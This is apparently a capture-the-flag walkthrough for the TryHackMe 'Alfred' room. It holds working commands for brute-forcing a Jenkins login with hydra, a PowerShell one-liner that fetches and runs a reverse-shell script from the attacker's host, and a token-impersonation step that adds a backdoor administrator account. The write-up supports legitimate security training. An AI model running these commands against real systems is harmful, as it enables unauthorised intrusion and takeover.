TryHackMe — Alfred w/o MSF
Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

[1]NMAP Scan
sudo nmap -A -T4 10.10.131.184 -oN nmap_alfred

[2]Visit Webpage
http://10.10.131.184:8080

[3]Brute force login page
Capture login traffic using burpsuite:


Brute form http-post-form using hydra:
Parameters for Hydra:
URL: /j_acegi_security_check
USER = j_username
PASS = j_password
Port = 8080
Invalid login message = Invalid username or password
hydra -s 8080 10.10.131.184 http-form-post “/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password” -L user.txt -P rockyou.txt -t 10 -w 30

[4]Login to webpage using gathered credentials


[5]Setup a python web server and netcat listener on kali

[6]Download and run Invoke-PowerShellTcp.ps1 to target machine
powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.11.17.48:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.17.48 -Port 1337



[6]Escalate privilege
whoami /priv

[7]Exploit SeImpersonatePrivilege using incognito.exe
powershell “(New-Object System.Net.WebClient).Downloadfile(‘http://10.11.17.48:8000/incognito.exe','incognito.exe')"

./incognito.exe add_user dummy pass123
./incognito.exe add_localgroup_user Administrators dummy

[8]Login to RDP using dummy account
rdesktop -u dummy -p pass123 10.10.131.184

run cmd as Administrator


References:
https://tryhackme.com/room/alfred
https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip